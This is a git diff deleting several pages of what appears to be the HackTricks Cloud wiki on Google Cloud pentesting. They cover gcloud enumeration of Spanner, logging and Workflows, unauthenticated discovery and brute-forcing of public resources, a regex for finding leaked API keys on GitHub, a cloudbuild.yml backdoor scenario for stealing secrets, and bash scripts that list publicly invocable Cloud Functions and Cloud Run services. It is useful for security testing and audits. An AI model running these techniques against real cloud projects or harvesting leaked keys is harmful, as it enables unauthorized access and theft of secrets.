-gcloud spanner instances list
-gcloud spanner instances describe
-gcloud spanner instances get-iam-policy
-
-## Databases
-gcloud spanner databases list --instance
-gcloud spanner databases describe --instance
-gcloud spanner databases get-iam-policy --instance
-gcloud spanner databases execute-sql --instance --sql
-
-## Backups
-gcloud spanner backups list --instance
-gcloud spanner backups get-iam-policy --instance
-
-## Instance Configs
-gcloud spanner instance-configs list
-gcloud spanner instance-configs describe
-```
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-stackdriver-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-stackdriver-enum.md
deleted file mode 100644
index 1e9390a4e..000000000
--- a/pentesting-cloud/gcp-security/gcp-services/gcp-stackdriver-enum.md
+++ /dev/null
@@ -1,59 +0,0 @@
-# GCP - Stackdriver Enum
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## [Stackdriver logging](https://cloud.google.com/sdk/gcloud/reference/logging/)
-
-[**Stackdriver**](https://cloud.google.com/stackdriver/) is recognized as a comprehensive infrastructure **logging suite** offered by Google. It has the capability to capture sensitive data through features like syslog, which reports individual commands executed inside Compute Instances. Furthermore, it monitors HTTP requests sent to load balancers or App Engine applications, network packet metadata within VPC communications, and more.
-
-For a Compute Instance, the corresponding service account requires merely **WRITE** permissions to facilitate logging of instance activities. Nonetheless, it's possible that an administrator might **inadvertently** provide the service account with both **READ** and **WRITE** permissions. In such instances, the logs can be scrutinized for sensitive information.
-
-To accomplish this, the [gcloud logging](https://cloud.google.com/sdk/gcloud/reference/logging/) utility offers a set of tools. Initially, identifying the types of logs present in your current project is recommended.
-
-```bash
-# List logs
-gcloud logging logs list
-
-# Read logs
-gcloud logging read [FOLDER]
-
-# Write logs
-# An attacker writing logs may confuse the Blue Team
-gcloud logging write [FOLDER] [MESSAGE]
-
-# List Buckets
-gcloud logging buckets list
-```
-
-## References
-
-* [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/#reviewing-stackdriver-logging](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/#reviewing-stackdriver-logging)
-* [https://initblog.com/2020/gcp-post-exploitation/](https://initblog.com/2020/gcp-post-exploitation/)
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-workflows-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-workflows-enum.md
deleted file mode 100644
index 4e909b9c1..000000000
--- a/pentesting-cloud/gcp-security/gcp-services/gcp-workflows-enum.md
+++ /dev/null
@@ -1,67 +0,0 @@
-# GCP - Workflows Enum
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## Basic Information
-
-**Google Cloud Platform (GCP) Workflows** is a service that helps you automate tasks that involve **multiple steps** across Google Cloud services and other web-based services. Think of it as a way to set up a **sequence of actions** that run on their own once triggered. You can design these sequences, called workflows, to do things like process data, handle software deployments, or manage cloud resources without having to manually oversee each step.
-
-### Encryption
-
-Related to encryption, by default the **Google-managed encryption key is use**d but it's possible to make it use a key of by customers.
-
-## Enumeration
-
-{% hint style="danger" %}
-You can also check the output of previous executions to look for sensitive information
-{% endhint %}
-
-{% code overflow="wrap" %}
-```bash
-# List Workflows
-gcloud workflows list
-
-# Get info and yaml of an specific workflow
-gcloud workflows describe
-
-# List executions
-gcloud workflows executions list workflow-1
-
-# Get execution info and output
-gcloud workflows executions describe projects//locations//workflows//executions/
-```
-{% endcode %}
-
-### Privesc and Post Exploitation
-
-{% content-ref url="../gcp-privilege-escalation/gcp-workflows-privesc.md" %}
-[gcp-workflows-privesc.md](../gcp-privilege-escalation/gcp-workflows-privesc.md)
-{% endcontent-ref %}
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/README.md b/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/README.md
deleted file mode 100644
index fd78bc1bb..000000000
--- a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/README.md
+++ /dev/null
@@ -1,44 +0,0 @@
-# GCP - Unauthenticated Enum & Access
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Public Assets Discovery - -One way to discover public cloud resources that belongs to a company is to scrape their webs looking for them. Tools like [**CloudScraper**](https://github.com/jordanpotti/CloudScraper) will scrape the web an search for **links to public cloud resources** (in this case this tools searches `['amazonaws.com', 'digitaloceanspaces.com', 'windows.net', 'storage.googleapis.com', 'aliyuncs.com']`) - -Note that other cloud resources could be searched for and that some times these resources are hidden behind **subdomains that are pointing them via CNAME registry**. - -## Public Resources Brute-Force - -### Buckets, Firebase, Apps & Cloud Functions - -* [https://github.com/initstring/cloud\_enum](https://github.com/initstring/cloud_enum): This tool in GCP brute-force Buckets, Firebase Realtime Databases, Google App Engine sites, and Cloud Functions -* [https://github.com/0xsha/CloudBrute](https://github.com/0xsha/CloudBrute): This tool in GCP brute-force Buckets and Apps. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-api-keys-unauthenticated-enum.md b/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-api-keys-unauthenticated-enum.md
deleted file mode 100644
index 80e5cfb49..000000000
--- a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-api-keys-unauthenticated-enum.md
+++ /dev/null
@@ -1,78 +0,0 @@
-# GCP - API Keys Unauthenticated Enum
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## API Keys - -For more information about API Keys check: - -{% content-ref url="../gcp-services/gcp-api-keys-enum.md" %} -[gcp-api-keys-enum.md](../gcp-services/gcp-api-keys-enum.md) -{% endcontent-ref %} - -### OSINT techniques - -**Google API Keys are widely used by any kind of applications** that uses from the client side. It's common to find them in for websites source code or network requests, in mobile applications or just searching for regexes in platforms like Github. - -The regex is: **`AIza[0-9A-Za-z_-]{35}`** - -Search it for example in Github following: [https://github.com/search?q=%2FAIza%5B0-9A-Za-z\_-%5D%7B35%7D%2F\&type=code\&ref=advsearch](https://github.com/search?q=%2FAIza%5B0-9A-Za-z_-%5D%7B35%7D%2F\&type=code\&ref=advsearch) - -### Check origin GCP project - `apikeys.keys.lookup` - -This is extremely useful to check to **which GCP project an API key that you have found belongs to**: - -```bash -# If you have permissions -gcloud services api-keys lookup AIzaSyD[...]uE8Y -name: projects/5[...]6/locations/global/keys/28d[...]e0e -parent: projects/5[...]6/locations/global - -# If you don't, you can still see the project ID in the error msg -gcloud services api-keys lookup AIzaSy[...]Qbkd_oYE -ERROR: (gcloud.services.api-keys.lookup) PERMISSION_DENIED: Permission 'apikeys.keys.lookup' denied on resource project. 
-Help Token: ARD_zUaNgNilGTg9oYUnMhfa3foMvL7qspRpBJ-YZog8RLbTjCTBolt_WjQQ3myTaOqu4VnPc5IbA6JrQN83CkGH6nNLum6wS4j1HF_7HiCUBHVN -- '@type': type.googleapis.com/google.rpc.PreconditionFailure - violations: - - subject: ?error_code=110002&service=cloudresourcemanager.googleapis.com&permission=serviceusage.apiKeys.getProjectForKey&resource=projects/89123452509 - type: googleapis.com -- '@type': type.googleapis.com/google.rpc.ErrorInfo - domain: apikeys.googleapis.com - metadata: - permission: serviceusage.apiKeys.getProjectForKey - resource: projects/89123452509 - service: cloudresourcemanager.googleapis.com - reason: AUTH_PERMISSION_DENIED -``` - -### Brute Force API endspoints - -As you might not know which APIs are enabled in the project, it would be interesting to run the tool [https://github.com/ozguralp/gmapsapiscanner](https://github.com/ozguralp/gmapsapiscanner) and check **what you can access with the API key.** - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-app-engine-unauthenticated-enum.md b/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-app-engine-unauthenticated-enum.md
deleted file mode 100644
index b6340a72b..000000000
--- a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-app-engine-unauthenticated-enum.md
+++ /dev/null
@@ -1,51 +0,0 @@
-# GCP - App Engine Unauthenticated Enum
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## App Engine - -For more information about App Engine check: - -{% content-ref url="../gcp-services/gcp-app-engine-enum.md" %} -[gcp-app-engine-enum.md](../gcp-services/gcp-app-engine-enum.md) -{% endcontent-ref %} - -### Brute Force Subdomains - -As mentioned the URL assigned to App Engine web pages is **`.appspot.com`** and if a service name is used it'll be: **`-dot-.appspot.com`**. - -As the **`project-uniq-name`** can be set by the person creating the project, they might be not that random and **brute-forcing them could find App Engine web apps exposed by companies**. - -You could use tools like the ones indicated in: - -{% content-ref url="./" %} -[.](./) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-artifact-registry-unauthenticated-enum.md b/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-artifact-registry-unauthenticated-enum.md
deleted file mode 100644
index 2e3594d5a..000000000
--- a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-artifact-registry-unauthenticated-enum.md
+++ /dev/null
@@ -1,47 +0,0 @@
-# GCP - Artifact Registry Unauthenticated Enum
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Artifact Registry - -For more information about Artifact Registry check: - -{% content-ref url="../gcp-services/gcp-artifact-registry-enum.md" %} -[gcp-artifact-registry-enum.md](../gcp-services/gcp-artifact-registry-enum.md) -{% endcontent-ref %} - -### Dependency Confusion - -Check the following page: - -{% content-ref url="../gcp-persistence/gcp-artifact-registry-persistence.md" %} -[gcp-artifact-registry-persistence.md](../gcp-persistence/gcp-artifact-registry-persistence.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-build-unauthenticated-enum.md b/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-build-unauthenticated-enum.md
deleted file mode 100644
index 57d506c09..000000000
--- a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-build-unauthenticated-enum.md
+++ /dev/null
@@ -1,71 +0,0 @@
-# GCP - Cloud Build Unauthenticated Enum
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Cloud Build - -For more information about Cloud Build check: - -{% content-ref url="../gcp-services/gcp-cloud-build-enum.md" %} -[gcp-cloud-build-enum.md](../gcp-services/gcp-cloud-build-enum.md) -{% endcontent-ref %} - -### cloudbuild.yml - -If you compromise write access over a repository containing a file named **`cloudbuild.yml`**, you could **backdoor** this file, which specifies the **commands that are going to be executed** inside a Cloud Build and exfiltrate the secrets, compromise what is done and also compromise the **Cloud Build service account.** - -{% hint style="info" %} -Note that GCP has the option to allow administrators to control the execution of build systems from external PRs via "Comment Control". Comment Control is a feature where collaborators/project owners **need to comment “/gcbrun” to trigger the build** against the PR and using this feature inherently prevents anyone on the internet from triggering your build systems. -{% endhint %} - -For some related information you could check the page about how to attack Github Actions (similar to this): - -{% content-ref url="../../../pentesting-ci-cd/github-security/abusing-github-actions/" %} -[abusing-github-actions](../../../pentesting-ci-cd/github-security/abusing-github-actions/) -{% endcontent-ref %} - -### PR Approvals - -When the trigger is PR because **anyone can perform PRs to public repositories** it would be very dangerous to just **allow the execution of the trigger with any PR**. Therefore, by default, the execution will only be **automatic for owners and collaborators**, and in order to execute the trigger with other users PRs an owner or collaborator must comment `/gcbrun`. - -
- -{% hint style="danger" %} -Therefore, is this is set to **`Not required`**, an attacker could perform a **PR to the branch** that will trigger the execution adding the malicious code execution to the **`cloudbuild.yml`** file and compromise the cloudbuild execution (note that cloudbuild will download the code FROM the PR, so it will execute the malicious **`cloudbuild.yml`**). -{% endhint %} - -Moreover, it's easy to see if some cloudbuild execution needs to be performed when you send a PR because it appears in Github: - -
- -{% hint style="warning" %} -Then, even if the cloudbuild is not executed the attacker will be able to see the **project name of a GCP project** that belongs to the company. -{% endhint %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-functions-unauthenticated-enum.md b/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-functions-unauthenticated-enum.md
deleted file mode 100644
index ba70bc1d7..000000000
--- a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-functions-unauthenticated-enum.md
+++ /dev/null
@@ -1,103 +0,0 @@
-# GCP - Cloud Functions Unauthenticated Enum
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Cloud Functions - -More information about Cloud Functions can be found in: - -{% content-ref url="../gcp-services/gcp-cloud-functions-enum.md" %} -[gcp-cloud-functions-enum.md](../gcp-services/gcp-cloud-functions-enum.md) -{% endcontent-ref %} - -### Brute Force URls - -**Brute Force the URL format**: - -* `https://-.cloudfunctions.net/` - -It's easier if you know project names. - -Check this page for some tools to perform this brute force: - -{% content-ref url="./" %} -[.](./) -{% endcontent-ref %} - -### Enumerate Open Cloud Functions - -With the following code [taken from here](https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp_misc/-/blob/master/find_open_functions.sh) you can find Cloud Functions that permit unauthenticated invocations. - -```bash -#!/bin/bash - -############################ -# Run this tool to find Cloud Functions that permit unauthenticated invocations -# anywhere in your GCP organization. -# Enjoy! -############################ - -for proj in $(gcloud projects list --format="get(projectId)"); do - echo "[*] scraping project $proj" - - enabled=$(gcloud services list --project "$proj" | grep "Cloud Functions API") - - if [ -z "$enabled" ]; then - continue - fi - - - for func_region in $(gcloud functions list --quiet --project "$proj" --format="value[separator=','](NAME,REGION)"); do - # drop substring from first occurence of "," to end of string. - func="${func_region%%,*}" - # drop substring from start of string up to last occurence of "," - region="${func_region##*,}" - ACL="$(gcloud functions get-iam-policy "$func" --project "$proj" --region "$region")" - - all_users="$(echo "$ACL" | grep allUsers)" - all_auth="$(echo "$ACL" | grep allAuthenticatedUsers)" - - if [ -z "$all_users" ] - then - : - else - echo "[!] Open to all users: $proj: $func" - fi - - if [ -z "$all_auth" ] - then - : - else - echo "[!] 
Open to all authenticated users: $proj: $func" - fi - done -done -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-run-unauthenticated-enum.md b/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-run-unauthenticated-enum.md
deleted file mode 100644
index fbb978d13..000000000
--- a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-run-unauthenticated-enum.md
+++ /dev/null
@@ -1,85 +0,0 @@
-# GCP - Cloud Run Unauthenticated Enum
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Cloud Run - -For more information about Cloud Run check: - -{% content-ref url="../gcp-services/gcp-cloud-run-enum.md" %} -[gcp-cloud-run-enum.md](../gcp-services/gcp-cloud-run-enum.md) -{% endcontent-ref %} - -### Enumerate Open Cloud Run - -With the following code [taken from here](https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp_misc/-/blob/master/find_open_cloudrun.sh) you can find Cloud Run services that permit unauthenticated invocations. - -```bash -#!/bin/bash - -############################ -# Run this tool to find Cloud Run services that permit unauthenticated -# invocations anywhere in your GCP organization. -# Enjoy! -############################ - -for proj in $(gcloud projects list --format="get(projectId)"); do - echo "[*] scraping project $proj" - - enabled=$(gcloud services list --project "$proj" | grep "Cloud Run API") - - if [ -z "$enabled" ]; then - continue - fi - - - for run in $(gcloud run services list --platform managed --quiet --project $proj --format="get(name)"); do - ACL="$(gcloud run services get-iam-policy $run --platform managed --project $proj)" - - all_users="$(echo $ACL | grep allUsers)" - all_auth="$(echo $ACL | grep allAuthenticatedUsers)" - - if [ -z "$all_users" ] - then - : - else - echo "[!] Open to all users: $proj: $run" - fi - - if [ -z "$all_auth" ] - then - : - else - echo "[!] Open to all authenticated users: $proj: $run" - fi - done -done -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
